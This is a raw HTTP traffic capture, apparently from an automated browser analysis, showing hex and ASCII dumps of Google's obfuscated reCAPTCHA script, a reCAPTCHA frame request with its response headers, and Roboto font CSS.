                                                                                                                                                                                                                                                                  2024-10-29 19:10:10 UTC567INData Raw: 2f 2a 20 41 6e 74 69 2d 73 70 61 6d 2e 20 57 61 6e 74 20 74 6f 20 73 61 79 20 68 65 6c 6c 6f 3f 20 43 6f 6e 74 61 63 74 20 28 62 61 73 65 36 34 29 20 59 6d 39 30 5a 33 56 68 63 6d 51 74 59 32 39 75 64 47 46 6a 64 45 42 6e 62 32 39 6e 62 47 55 75 59 32 39 74 20 2a 2f 20 28 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 7a 3d 74 68 69 73 7c 7c 73 65 6c 66 2c 4c 3d 66 75 6e 63 74 69 6f 6e 28 66 2c 62 29 7b 69 66 28 66 3d 28 62 3d 6e 75 6c 6c 2c 7a 29 2e 74 72 75 73 74 65 64 54 79 70 65 73 2c 21 66 7c 7c 21 66 2e 63 72 65 61 74 65 50 6f 6c 69 63 79 29 72 65 74 75 72 6e 20 62 3b 74 72 79 7b 62 3d 66 2e 63 72 65 61 74 65 50 6f 6c 69 63 79 28 22 62 67 22 2c 7b 63 72 65 61 74 65 48 54 4d 4c 3a 54 2c 63 72 65 61 74 65 53 63 72 69 70 74 3a 54 2c 63 72 65 61 74 65 53
                                                                                                                                                                                                                                                                  Data Ascii: /* Anti-spam. Want to say hello? Contact (base64) Ym90Z3VhcmQtY29udGFjdEBnb29nbGUuY29t */ (function(){var z=this||self,L=function(f,b){if(f=(b=null,z).trustedTypes,!f||!f.createPolicy)return b;try{b=f.createPolicy("bg",{createHTML:T,createScript:T,createS
                                                                                                                                                                                                                                                                  2024-10-29 19:10:10 UTC1378INData Raw: 4c 43 27 2c 0a 27 20 53 50 44 58 2d 4c 69 63 65 6e 73 65 2d 49 64 65 6e 74 69 66 69 65 72 3a 20 41 70 61 63 68 65 2d 32 2e 30 27 2c 0a 27 2a 2f 27 2c 0a 27 76 61 72 20 57 3d 74 68 69 73 7c 7c 73 65 6c 66 2c 66 34 3d 66 75 6e 63 74 69 6f 6e 28 66 2c 62 2c 64 2c 54 29 7b 66 6f 72 28 64 3d 28 54 3d 42 28 66 29 2c 30 29 3b 62 3e 30 3b 62 2d 2d 29 64 3d 64 3c 3c 38 7c 67 28 66 29 3b 68 28 54 2c 66 2c 64 29 7d 2c 67 3d 66 75 6e 63 74 69 6f 6e 28 66 29 7b 72 65 74 75 72 6e 20 66 2e 47 3f 62 4b 28 66 2e 59 2c 66 29 3a 65 28 38 2c 66 2c 74 72 75 65 29 7d 2c 42 3d 66 75 6e 63 74 69 6f 6e 28 66 2c 62 29 7b 69 66 28 66 2e 47 29 72 65 74 75 72 6e 20 62 4b 28 66 2e 59 2c 66 29 3b 72 65 74 75 72 6e 20 62 3d 65 28 38 2c 66 2c 74 72 75 65 29 2c 62 26 31 32 38 26 26 28 62
                                                                                                                                                                                                                                                                  Data Ascii: LC',' SPDX-License-Identifier: Apache-2.0','*/','var W=this||self,f4=function(f,b,d,T){for(d=(T=B(f),0);b>0;b--)d=d<<8|g(f);h(T,f,d)},g=function(f){return f.G?bK(f.Y,f):e(8,f,true)},B=function(f,b){if(f.G)return bK(f.Y,f);return b=e(8,f,true),b&128&&(b
                                                                                                                                                                                                                                                                  2024-10-29 19:10:10 UTC1378INData Raw: 66 29 2c 42 28 66 29 29 2c 5a 28 66 2c 64 29 29 29 2c 54 2c 66 29 7d 2c 49 3d 66 75 6e 63 74 69 6f 6e 28 66 2c 62 2c 64 2c 54 2c 6c 2c 6b 29 7b 69 66 28 62 2e 41 2e 6c 65 6e 67 74 68 29 7b 62 2e 5a 53 3d 28 28 62 2e 52 26 26 22 3a 54 51 52 3a 54 51 52 3a 22 28 29 2c 62 29 2e 52 3d 74 72 75 65 2c 66 29 3b 74 72 79 7b 6c 3d 62 2e 42 28 29 2c 62 2e 49 3d 6c 2c 62 2e 53 3d 30 2c 62 2e 76 3d 30 2c 62 2e 4c 3d 6c 2c 54 3d 57 31 28 66 2c 62 29 2c 66 3d 64 3f 30 3a 31 30 2c 6b 3d 62 2e 42 28 29 2d 62 2e 49 2c 62 2e 4b 57 2b 3d 6b 2c 62 2e 70 57 26 26 62 2e 70 57 28 6b 2d 62 2e 4f 2c 62 2e 67 2c 62 2e 55 2c 62 2e 53 29 2c 62 2e 4f 3d 30 2c 62 2e 67 3d 66 61 6c 73 65 2c 62 2e 55 3d 66 61 6c 73 65 2c 6b 3c 66 7c 7c 62 2e 41 63 2d 2d 3c 3d 30 7c 7c 28 6b 3d 4d 61 74
                                                                                                                                                                                                                                                                  Data Ascii: f),B(f)),Z(f,d))),T,f)},I=function(f,b,d,T,l,k){if(b.A.length){b.ZS=((b.R&&":TQR:TQR:"(),b).R=true,f);try{l=b.B(),b.I=l,b.S=0,b.v=0,b.L=l,T=W1(f,b),f=d?0:10,k=b.B()-b.I,b.KW+=k,b.pW&&b.pW(k-b.O,b.g,b.U,b.S),b.O=0,b.g=false,b.U=false,k<f||b.Ac--<=0||(k=Mat
                                                                                                                                                                                                                                                                  2024-10-29 19:10:10 UTC1378INData Raw: 28 7a 7c 30 29 26 28 31 3c 3c 7a 29 2d 31 29 3c 3c 28 6c 7c 30 29 2d 28 7a 7c 30 29 2c 6c 2d 3d 7a 2c 59 2b 3d 7a 3b 72 65 74 75 72 6e 20 68 28 31 39 39 2c 62 2c 28 4f 7c 28 64 3d 54 2c 30 29 29 2b 28 66 7c 30 29 29 2c 64 7d 2c 51 3d 66 75 6e 63 74 69 6f 6e 28 66 2c 62 2c 64 2c 54 2c 6c 2c 6b 29 7b 69 66 28 64 2e 43 3d 3d 64 29 66 6f 72 28 6b 3d 5a 28 64 2c 62 29 2c 62 3d 3d 35 36 7c 7c 62 3d 3d 37 30 7c 7c 62 3d 3d 32 34 35 3f 28 62 3d 66 75 6e 63 74 69 6f 6e 28 4f 2c 70 2c 79 2c 7a 29 7b 69 66 28 6b 2e 7a 59 21 3d 28 70 3d 28 7a 3d 6b 2e 6c 65 6e 67 74 68 2c 28 7a 7c 30 29 2d 34 3e 3e 33 29 2c 70 29 29 7b 70 3d 28 70 3c 3c 33 29 2d 28 79 3d 5b 30 2c 30 2c 28 6b 2e 7a 59 3d 70 2c 6c 5b 31 5d 29 2c 6c 5b 32 5d 5d 2c 34 29 3b 74 72 79 7b 6b 2e 4d 37 3d 79
                                                                                                                                                                                                                                                                  Data Ascii: (z|0)&(1<<z)-1)<<(l|0)-(z|0),l-=z,Y+=z;return h(199,b,(O|(d=T,0))+(f|0)),d},Q=function(f,b,d,T,l,k){if(d.C==d)for(k=Z(d,b),b==56||b==70||b==245?(b=function(O,p,y,z){if(k.zY!=(p=(z=k.length,(z|0)-4>>3),p)){p=(p<<3)-(y=[0,0,(k.zY=p,l[1]),l[2]],4);try{k.M7=y
                                                                                                                                                                                                                                                                  2024-10-29 19:10:10 UTC1378INData Raw: 68 28 66 2c 54 3e 3e 38 26 32 35 35 2c 54 26 32 35 35 29 2c 6c 21 3d 76 6f 69 64 20 30 26 26 4f 2e 70 75 73 68 28 6c 26 32 35 35 29 29 2c 66 3d 22 22 2c 64 26 26 28 64 2e 6d 65 73 73 61 67 65 26 26 28 66 2b 3d 64 2e 6d 65 73 73 61 67 65 29 2c 64 2e 73 74 61 63 6b 26 26 28 66 2b 3d 22 3a 22 2b 64 2e 73 74 61 63 6b 29 29 2c 64 3d 5a 28 62 2c 33 39 37 29 2c 64 5b 30 5d 3e 33 29 29 7b 64 3d 28 66 3d 4e 50 28 28 64 5b 66 3d 66 2e 73 6c 69 63 65 28 30 2c 28 64 5b 30 5d 7c 30 29 2d 33 29 2c 30 5d 2d 3d 28 66 2e 6c 65 6e 67 74 68 7c 30 29 2b 33 2c 66 29 29 2c 62 2e 43 29 2c 62 2e 43 3d 62 3b 74 72 79 7b 62 2e 61 45 3f 28 70 3d 28 70 3d 5a 28 62 2c 33 36 30 29 29 26 26 70 5b 70 2e 6c 65 6e 67 74 68 2d 31 5d 7c 7c 39 35 2c 28 6b 3d 5a 28 62 2c 35 34 29 29 26 26 6b
                                                                                                                                                                                                                                                                  Data Ascii: h(f,T>>8&255,T&255),l!=void 0&&O.push(l&255)),f="",d&&(d.message&&(f+=d.message),d.stack&&(f+=":"+d.stack)),d=Z(b,397),d[0]>3)){d=(f=NP((d[f=f.slice(0,(d[0]|0)-3),0]-=(f.length|0)+3,f)),b.C),b.C=b;try{b.aE?(p=(p=Z(b,360))&&p[p.length-1]||95,(k=Z(b,54))&&k
                                                                                                                                                                                                                                                                  2024-10-29 19:10:10 UTC1378INData Raw: 68 28 37 30 2c 66 2c 28 68 28 31 36 38 2c 28 28 68 28 31 31 36 2c 28 50 28 38 30 2c 28 50 28 32 31 36 2c 28 50 28 32 35 2c 28 50 28 31 39 30 2c 28 50 28 28 68 28 32 36 2c 66 2c 28 68 28 31 39 39 2c 28 28 66 2e 6c 61 61 6e 74 66 3d 28 66 2e 6b 75 79 64 71 73 3d 5b 5d 2c 66 2e 63 70 6e 71 6a 6e 3d 22 22 2c 66 2e 62 67 6f 64 6e 64 3d 30 2c 5b 5d 29 2c 66 2e 44 26 26 66 2e 44 2e 61 29 26 26 28 28 64 3d 66 2e 44 2e 62 29 26 26 28 66 2e 62 67 6f 64 6e 64 3d 64 29 2c 28 64 3d 66 2e 44 2e 63 29 26 26 28 66 2e 63 70 6e 71 6a 6e 3d 64 29 2c 28 64 3d 66 2e 44 2e 64 29 26 26 28 66 2e 6b 75 79 64 71 73 3d 64 29 2c 28 64 3d 66 2e 44 2e 65 29 26 26 28 66 2e 6c 61 61 6e 74 66 3d 64 29 29 2c 66 29 2c 30 29 2c 30 29 29 2c 36 38 29 2c 66 2c 66 75 6e 63 74 69 6f 6e 28 7a 29
                                                                                                                                                                                                                                                                  Data Ascii: h(70,f,(h(168,((h(116,(P(80,(P(216,(P(25,(P(190,(P((h(26,f,(h(199,((f.laantf=(f.kuydqs=[],f.cpnqjn="",f.bgodnd=0,[]),f.D&&f.D.a)&&((d=f.D.b)&&(f.bgodnd=d),(d=f.D.c)&&(f.cpnqjn=d),(d=f.D.d)&&(f.kuydqs=d),(d=f.D.e)&&(f.laantf=d)),f),0),0)),68),f,function(z)
                                                                                                                                                                                                                                                                  2024-10-29 19:10:10 UTC1378INData Raw: 2c 4d 2c 4e 29 7b 66 6f 72 28 4e 3d 28 4d 3d 28 4c 3d 5a 28 7a 2c 28 59 3d 28 78 3d 42 28 7a 29 2c 6e 3d 4c 34 28 7a 29 2c 22 22 29 2c 35 31 31 29 29 2c 4c 2e 6c 65 6e 67 74 68 29 2c 30 29 3b 6e 2d 2d 3b 29 4e 3d 28 28 4e 7c 30 29 2b 28 4c 34 28 7a 29 7c 30 29 29 25 4d 2c 59 2b 3d 70 5b 4c 5b 4e 5d 5d 3b 68 28 78 2c 7a 2c 59 29 7d 29 29 2c 66 75 6e 63 74 69 6f 6e 28 7a 29 7b 66 34 28 7a 2c 34 29 7d 29 29 2c 68 29 28 34 37 35 2c 66 2c 5b 31 36 30 2c 30 2c 30 5d 29 2c 66 75 6e 63 74 69 6f 6e 28 7a 2c 4c 2c 59 2c 6e 29 7b 68 28 28 59 3d 28 6e 3d 5a 28 7a 2c 28 4c 3d 28 6e 3d 28 59 3d 42 28 7a 29 2c 42 29 28 7a 29 2c 42 29 28 7a 29 2c 6e 29 29 2c 5a 28 7a 2c 59 29 3d 3d 6e 29 2c 4c 29 2c 7a 2c 2b 59 29 7d 29 29 2c 66 75 6e 63 74 69 6f 6e 28 7a 2c 4c 2c 59 29
                                                                                                                                                                                                                                                                  Data Ascii: ,M,N){for(N=(M=(L=Z(z,(Y=(x=B(z),n=L4(z),""),511)),L.length),0);n--;)N=((N|0)+(L4(z)|0))%M,Y+=p[L[N]];h(x,z,Y)})),function(z){f4(z,4)})),h)(475,f,[160,0,0]),function(z,L,Y,n){h((Y=(n=Z(z,(L=(n=(Y=B(z),B)(z),B)(z),n)),Z(z,Y)==n),L),z,+Y)})),function(z,L,Y)
                                                                                                                                                                                                                                                                  2024-10-29 19:10:10 UTC1378INData Raw: 77 20 78 5b 4d 5d 3a 6e 3d 3d 31 3f 6e 65 77 20 78 5b 4d 5d 28 4c 5b 30 5d 29 3a 6e 3d 3d 32 3f 6e 65 77 20 78 5b 4d 5d 28 4c 5b 30 5d 2c 4c 5b 31 5d 29 3a 6e 3d 3d 33 3f 6e 65 77 20 78 5b 4d 5d 28 4c 5b 30 5d 2c 4c 5b 31 5d 2c 4c 5b 32 5d 29 3a 6e 3d 3d 34 3f 6e 65 77 20 78 5b 4d 5d 28 4c 5b 30 5d 2c 4c 5b 31 5d 2c 4c 5b 32 5d 2c 4c 5b 33 5d 29 3a 32 28 29 2c 68 28 59 2c 7a 2c 4c 29 29 7d 29 29 2c 66 29 2c 66 75 6e 63 74 69 6f 6e 28 7a 2c 4c 2c 59 2c 6e 2c 78 2c 4d 2c 4e 29 7b 69 66 28 21 47 28 74 72 75 65 2c 74 72 75 65 2c 7a 2c 4c 29 29 7b 69 66 28 54 4c 28 28 59 3d 28 78 3d 5a 28 28 4d 3d 5a 28 28 4c 3d 28 4d 3d 28 59 3d 28 4c 3d 28 78 3d 42 28 7a 29 2c 42 28 7a 29 29 2c 42 28 7a 29 29 2c 42 28 7a 29 29 2c 5a 28 7a 2c 4c 29 29 2c 7a 29 2c 4d 29 2c 7a
                                                                                                                                                                                                                                                                  Data Ascii: w x[M]:n==1?new x[M](L[0]):n==2?new x[M](L[0],L[1]):n==3?new x[M](L[0],L[1],L[2]):n==4?new x[M](L[0],L[1],L[2],L[3]):2(),h(Y,z,L))})),f),function(z,L,Y,n,x,M,N){if(!G(true,true,z,L)){if(TL((Y=(x=Z((M=Z((L=(M=(Y=(L=(x=B(z),B(z)),B(z)),B(z)),Z(z,L)),z),M),z
                                                                                                                                                                                                                                                                  2024-10-29 19:10:10 UTC1378INData Raw: 20 30 29 2c 66 7d 2c 41 42 3d 66 75 6e 63 74 69 6f 6e 28 66 2c 62 29 7b 66 75 6e 63 74 69 6f 6e 20 64 28 29 7b 74 68 69 73 2e 48 3d 74 68 69 73 2e 6c 3d 74 68 69 73 2e 6e 3d 30 7d 72 65 74 75 72 6e 5b 66 75 6e 63 74 69 6f 6e 28 54 29 7b 62 2e 63 34 28 54 29 2c 66 2e 63 34 28 54 29 7d 2c 28 66 3d 28 62 3d 28 28 64 2e 70 72 6f 74 6f 74 79 70 65 2e 4f 39 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 74 68 69 73 2e 6e 3d 3d 3d 30 3f 30 3a 4d 61 74 68 2e 73 71 72 74 28 74 68 69 73 2e 6c 2f 74 68 69 73 2e 6e 29 7d 2c 64 2e 70 72 6f 74 6f 74 79 70 65 29 2e 63 34 3d 66 75 6e 63 74 69 6f 6e 28 54 2c 6c 29 7b 74 68 69 73 2e 6c 2b 3d 28 6c 3d 54 2d 74 68 69 73 2e 48 2c 74 68 69 73 2e 6e 2b 2b 2c 74 68 69 73 2e 48 2b 3d 6c 2f 74 68 69 73 2e 6e 2c 6c 29 2a
                                                                                                                                                                                                                                                                  Data Ascii: 0),f},AB=function(f,b){function d(){this.H=this.l=this.n=0}return[function(T){b.c4(T),f.c4(T)},(f=(b=((d.prototype.O9=function(){return this.n===0?0:Math.sqrt(this.l/this.n)},d.prototype).c4=function(T,l){this.l+=(l=T-this.H,this.n++,this.H+=l/this.n,l)*
                                                                                                                                                                                                                                                                  2024-10-29 19:10:10 UTC1378INData Raw: 74 65 3d 3d 3d 22 6c 6f 61 64 69 6e 67 22 26 26 28 62 2e 5a 3d 66 75 6e 63 74 69 6f 6e 28 6b 2c 4f 29 7b 66 75 6e 63 74 69 6f 6e 20 70 28 29 7b 4f 7c 7c 28 4f 3d 74 72 75 65 2c 6b 28 29 29 7d 57 2e 64 6f 63 75 6d 65 6e 74 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 22 44 4f 4d 43 6f 6e 74 65 6e 74 4c 6f 61 64 65 64 22 2c 28 4f 3d 66 61 6c 73 65 2c 70 29 2c 4a 29 2c 57 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 22 6c 6f 61 64 22 2c 70 2c 4a 29 7d 29 7d 7d 2c 53 2c 4a 42 3d 66 75 6e 63 74 69 6f 6e 28 66 2c 62 29 7b 69 66 28 28 66 3d 28 62 3d 6e 75 6c 6c 2c 57 2e 74 72 75 73 74 65 64 54 79 70 65 73 29 2c 21 66 29 7c 7c 21 66 2e 63 72 65 61 74 65 50 6f 6c 69 63 79 29 72 65 74 75 72 6e 20 62 3b 74 72 79 7b 62 3d 66 2e 63 72 65 61 74 65 50
                                                                                                                                                                                                                                                                  Data Ascii: te==="loading"&&(b.Z=function(k,O){function p(){O||(O=true,k())}W.document.addEventListener("DOMContentLoaded",(O=false,p),J),W.addEventListener("load",p,J)})}},S,JB=function(f,b){if((f=(b=null,W.trustedTypes),!f)||!f.createPolicy)return b;try{b=f.createP


                                                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                  58192.168.2.1649779142.250.186.684437056C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                  2024-10-29 19:10:10 UTC868OUTGET /recaptcha/api2/bframe?hl=en&v=-ZG7BC9TxCVEbzIO2m429usb&k=6LfT61wqAAAAAOLaMTaK9Ln8bjdWJ8-ahQ3zE9AF HTTP/1.1
                                                                                                                                                                                                                                                                  Host: www.google.com
                                                                                                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                                                                                                  sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                  sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                  sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                  Upgrade-Insecure-Requests: 1
                                                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                                                                                                                                                  X-Client-Data: CIu2yQEIprbJAQipncoBCLbgygEIkqHLAQj2mM0BCIWgzQEIucrNAQiJ080BGMvYzQEY642lFw==
                                                                                                                                                                                                                                                                  Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                                  Sec-Fetch-Mode: navigate
                                                                                                                                                                                                                                                                  Sec-Fetch-Dest: iframe
                                                                                                                                                                                                                                                                  Referer: https://usqe.bin4tgla.com/
                                                                                                                                                                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                  2024-10-29 19:10:10 UTC1161INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                  Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                                                                                  Cross-Origin-Resource-Policy: cross-origin
                                                                                                                                                                                                                                                                  Cross-Origin-Embedder-Policy: require-corp
                                                                                                                                                                                                                                                                  Report-To: {"group":"recaptcha","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/recaptcha"}]}
                                                                                                                                                                                                                                                                  Report-To: {"group":"coop_38fac9d5b82543fc4729580d18ff2d3d","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/38fac9d5b82543fc4729580d18ff2d3d"}]}
                                                                                                                                                                                                                                                                  Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                                                                                                                  Pragma: no-cache
                                                                                                                                                                                                                                                                  Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                                                                                                                  Date: Tue, 29 Oct 2024 19:10:10 GMT
                                                                                                                                                                                                                                                                  Content-Security-Policy: script-src 'report-sample' 'nonce-asZjgujsUXR-lbyeSW_KvA' 'unsafe-inline' 'strict-dynamic' https: http: 'unsafe-eval';object-src 'none';base-uri 'self';report-uri https://csp.withgoogle.com/csp/recaptcha/1
                                                                                                                                                                                                                                                                  Cross-Origin-Opener-Policy-Report-Only: same-origin; report-to="coop_38fac9d5b82543fc4729580d18ff2d3d"
                                                                                                                                                                                                                                                                  Server: ESF
                                                                                                                                                                                                                                                                  X-XSS-Protection: 0
                                                                                                                                                                                                                                                                  X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                  Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                                                                                                  Accept-Ranges: none
                                                                                                                                                                                                                                                                  Vary: Accept-Encoding
                                                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                  2024-10-29 19:10:10 UTC217INData Raw: 31 65 31 34 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 3e 3c 68 74 6d 6c 20 64 69 72 3d 22 6c 74 72 22 20 6c 61 6e 67 3d 22 65 6e 22 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 0a 0a 3c 74 69 74 6c 65 3e 72 65 43 41 50 54 43 48 41 3c 2f 74 69 74 6c 65 3e 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78
                                                                                                                                                                                                                                                                  Data Ascii: 1e14<!DOCTYPE HTML><html dir="ltr" lang="en"><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"><meta http-equiv="X-UA-Compatible" content="IE=edge"><title>reCAPTCHA</title><style type="tex
                                                                                                                                                                                                                                                                  2024-10-29 19:10:10 UTC1378INData Raw: 74 2f 63 73 73 22 3e 0a 2f 2a 20 63 79 72 69 6c 6c 69 63 2d 65 78 74 20 2a 2f 0a 40 66 6f 6e 74 2d 66 61 63 65 20 7b 0a 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 27 52 6f 62 6f 74 6f 27 3b 0a 20 20 66 6f 6e 74 2d 73 74 79 6c 65 3a 20 6e 6f 72 6d 61 6c 3b 0a 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 34 30 30 3b 0a 20 20 73 72 63 3a 20 75 72 6c 28 2f 2f 66 6f 6e 74 73 2e 67 73 74 61 74 69 63 2e 63 6f 6d 2f 73 2f 72 6f 62 6f 74 6f 2f 76 31 38 2f 4b 46 4f 6d 43 6e 71 45 75 39 32 46 72 31 4d 75 37 32 78 4b 4f 7a 59 2e 77 6f 66 66 32 29 20 66 6f 72 6d 61 74 28 27 77 6f 66 66 32 27 29 3b 0a 20 20 75 6e 69 63 6f 64 65 2d 72 61 6e 67 65 3a 20 55 2b 30 34 36 30 2d 30 35 32 46 2c 20 55 2b 31 43 38 30 2d 31 43 38 41 2c 20 55 2b 32 30 42 34 2c 20 55 2b 32 44 45
                                                                                                                                                                                                                                                                  Data Ascii: t/css">/* cyrillic-ext */@font-face { font-family: 'Roboto'; font-style: normal; font-weight: 400; src: url(//fonts.gstatic.com/s/roboto/v18/KFOmCnqEu92Fr1Mu72xKOzY.woff2) format('woff2'); unicode-range: U+0460-052F, U+1C80-1C8A, U+20B4, U+2DE
                                                                                                                                                                                                                                                                  2024-10-29 19:10:10 UTC1378INData Raw: 20 55 2b 30 33 32 39 2c 20 55 2b 31 45 41 30 2d 31 45 46 39 2c 20 55 2b 32 30 41 42 3b 0a 7d 0a 2f 2a 20 6c 61 74 69 6e 2d 65 78 74 20 2a 2f 0a 40 66 6f 6e 74 2d 66 61 63 65 20 7b 0a 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 27 52 6f 62 6f 74 6f 27 3b 0a 20 20 66 6f 6e 74 2d 73 74 79 6c 65 3a 20 6e 6f 72 6d 61 6c 3b 0a 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 34 30 30 3b 0a 20 20 73 72 63 3a 20 75 72 6c 28 2f 2f 66 6f 6e 74 73 2e 67 73 74 61 74 69 63 2e 63 6f 6d 2f 73 2f 72 6f 62 6f 74 6f 2f 76 31 38 2f 4b 46 4f 6d 43 6e 71 45 75 39 32 46 72 31 4d 75 37 47 78 4b 4f 7a 59 2e 77 6f 66 66 32 29 20 66 6f 72 6d 61 74 28 27 77 6f 66 66 32 27 29 3b 0a 20 20 75 6e 69 63 6f 64 65 2d 72 61 6e 67 65 3a 20 55 2b 30 31 30 30 2d 30 32 42 41 2c 20 55 2b 30 32 42
                                                                                                                                                                                                                                                                  Data Ascii: U+0329, U+1EA0-1EF9, U+20AB;}/* latin-ext */@font-face { font-family: 'Roboto'; font-style: normal; font-weight: 400; src: url(//fonts.gstatic.com/s/roboto/v18/KFOmCnqEu92Fr1Mu7GxKOzY.woff2) format('woff2'); unicode-range: U+0100-02BA, U+02B
                                                                                                                                                                                                                                                                  2024-10-29 19:10:10 UTC1378INData Raw: 6e 74 2d 66 61 63 65 20 7b 0a 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 27 52 6f 62 6f 74 6f 27 3b 0a 20 20 66 6f 6e 74 2d 73 74 79 6c 65 3a 20 6e 6f 72 6d 61 6c 3b 0a 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 35 30 30 3b 0a 20 20 73 72 63 3a 20 75 72 6c 28 2f 2f 66 6f 6e 74 73 2e 67 73 74 61 74 69 63 2e 63 6f 6d 2f 73 2f 72 6f 62 6f 74 6f 2f 76 31 38 2f 4b 46 4f 6c 43 6e 71 45 75 39 32 46 72 31 4d 6d 45 55 39 66 43 42 63 34 45 73 41 2e 77 6f 66 66 32 29 20 66 6f 72 6d 61 74 28 27 77 6f 66 66 32 27 29 3b 0a 20 20 75 6e 69 63 6f 64 65 2d 72 61 6e 67 65 3a 20 55 2b 31 46 30 30 2d 31 46 46 46 3b 0a 7d 0a 2f 2a 20 67 72 65 65 6b 20 2a 2f 0a 40 66 6f 6e 74 2d 66 61 63 65 20 7b 0a 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 27 52 6f 62 6f 74 6f 27 3b 0a
                                                                                                                                                                                                                                                                  Data Ascii: nt-face { font-family: 'Roboto'; font-style: normal; font-weight: 500; src: url(//fonts.gstatic.com/s/roboto/v18/KFOlCnqEu92Fr1MmEU9fCBc4EsA.woff2) format('woff2'); unicode-range: U+1F00-1FFF;}/* greek */@font-face { font-family: 'Roboto';
                                                                                                                                                                                                                                                                  2024-10-29 19:10:10 UTC1378INData Raw: 6f 6d 2f 73 2f 72 6f 62 6f 74 6f 2f 76 31 38 2f 4b 46 4f 6c 43 6e 71 45 75 39 32 46 72 31 4d 6d 45 55 39 66 42 42 63 34 2e 77 6f 66 66 32 29 20 66 6f 72 6d 61 74 28 27 77 6f 66 66 32 27 29 3b 0a 20 20 75 6e 69 63 6f 64 65 2d 72 61 6e 67 65 3a 20 55 2b 30 30 30 30 2d 30 30 46 46 2c 20 55 2b 30 31 33 31 2c 20 55 2b 30 31 35 32 2d 30 31 35 33 2c 20 55 2b 30 32 42 42 2d 30 32 42 43 2c 20 55 2b 30 32 43 36 2c 20 55 2b 30 32 44 41 2c 20 55 2b 30 32 44 43 2c 20 55 2b 30 33 30 34 2c 20 55 2b 30 33 30 38 2c 20 55 2b 30 33 32 39 2c 20 55 2b 32 30 30 30 2d 32 30 36 46 2c 20 55 2b 32 30 41 43 2c 20 55 2b 32 31 32 32 2c 20 55 2b 32 31 39 31 2c 20 55 2b 32 31 39 33 2c 20 55 2b 32 32 31 32 2c 20 55 2b 32 32 31 35 2c 20 55 2b 46 45 46 46 2c 20 55 2b 46 46 46 44 3b 0a 7d
                                                                                                                                                                                                                                                                  Data Ascii: om/s/roboto/v18/KFOlCnqEu92Fr1MmEU9fBBc4.woff2) format('woff2'); unicode-range: U+0000-00FF, U+0131, U+0152-0153, U+02BB-02BC, U+02C6, U+02DA, U+02DC, U+0304, U+0308, U+0329, U+2000-206F, U+20AC, U+2122, U+2191, U+2193, U+2212, U+2215, U+FEFF, U+FFFD;}
